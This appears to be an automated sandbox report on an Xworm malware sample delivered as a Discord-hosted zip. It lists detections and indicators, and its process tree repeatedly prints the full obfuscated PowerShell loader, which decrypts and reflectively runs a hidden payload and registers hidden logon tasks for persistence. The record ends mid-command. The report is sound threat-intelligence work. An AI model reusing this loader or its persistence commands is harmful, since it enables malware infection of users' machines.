Analysis Overview
Threat Level: Known bad
The file https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df& was found to be: Known bad.
Malicious Activity Summary
Detect Xworm Payload
Xworm
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
NTFS ADS
Suspicious use of WriteProcessMemory
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Opens file in notepad (likely ransom note)
Enumerates system info in registry
Suspicious behavior: EnumeratesProcesses
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-05-29 19:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-29 19:53
Reported
2024-05-29 19:55
Platform
win11-20240508-en
Max time kernel
90s
Max time network
93s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Xworm
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2457560273-69882387-977367775-1000_Classes\Local Settings | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2457560273-69882387-977367775-1000\{CF5ABFFC-0817-4064-9FB6-89A0BEFED940} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Classic_Tag.zip:Zone.Identifier | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\startup_str_714.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\startup_str_242.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\startup_str_690.bat\:Zone.Identifier:$DATA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Opens file in notepad (likely ransom note)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\NOTEPAD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://cdn.discordapp.com/attachments/1236808584256553051/1236809096150126664/Classic_Tag.zip?ex=665856fb&is=6657057b&hm=bb2a195faf9085e5d2688dd8ac6b505ccca9e3f2996736a1d3c2441a2c0d31df&
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff808393cb8,0x7ff808393cc8,0x7ff808393cd8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1864 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2416 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3240 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4228 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5168 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5960 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6256 /prefetch:8
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_714_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_714.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_714.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_714.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_714.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_714.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5156 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1976 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1692 /prefetch:1
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\Instructions.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6556 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6808 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7000 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6240 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6780 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5036 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1848,10042612692980482852,18021938200259490603,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6884 /prefetch:1
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_242_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_242.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_242.vbs"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_242.bat" "
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_242.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_242.bat').Split([Environment]::NewLine);foreach ($vYgMU in $Dgxmx) { if ($vYgMU.StartsWith(':: ')) { $IglnE=$vYgMU.Substring(3); break; }}$payloads_var=[string[]]$IglnE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mPwRBm9qXJoyRc9bqNC0u+iAvpHRjwzR0xhhmQKq+YY='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('T+n2u+f+rr7kGOYnZCk7cA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pNaoh=New-Object System.IO.MemoryStream(,$param_var); $QcgRK=New-Object System.IO.MemoryStream; $LEpGH=New-Object System.IO.Compression.GZipStream($pNaoh, [IO.Compression.CompressionMode]::Decompress); $LEpGH.CopyTo($QcgRK); $LEpGH.Dispose(); $pNaoh.Dispose(); $QcgRK.Dispose(); $QcgRK.ToArray();}function execute_function($param_var,$param2_var){ $kvhNG=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ExMXI=$kvhNG.EntryPoint; $ExMXI.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\Downloads\Classic_Tag\Classic_Tag\APK_Installer.bat';$Dgxmx=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join 